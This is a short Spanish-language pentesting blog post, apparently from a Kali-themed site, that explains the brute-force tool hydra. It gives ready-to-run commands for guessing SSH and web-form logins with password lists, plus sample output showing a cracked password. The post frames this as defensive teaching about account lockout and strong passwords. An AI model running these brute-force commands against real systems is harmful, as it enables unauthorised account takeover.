~ / blog / pentesting
KALI

Fuerza bruta con hydra

hydra prueba miles de contraseñas por segundo contra un servicio de login.

Le das el usuario o una lista, un diccionario de contraseñas, la IP y el protocolo, como ssh, ftp o el formulario web. Cuando encuentra una combinación válida, te la muestra.

Por eso importa el bloqueo por intentos fallidos y las contraseñas largas: sin eso, hydra entra. Solo en tus sistemas.

# los comandos

kali@kali:~$ hydra -l admin -P rockyou.txt ssh://10.0.0.5copiar
[22][ssh] host: 10.0.0.5 login: admin password: verano2026
1 of 1 target successfully completed
kali@kali:~$ hydra -L users.txt -P pass.txt 10.0.0.5 http-post-form '/login:u=^USER^&p=^PASS^:incorrecto'copiar
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.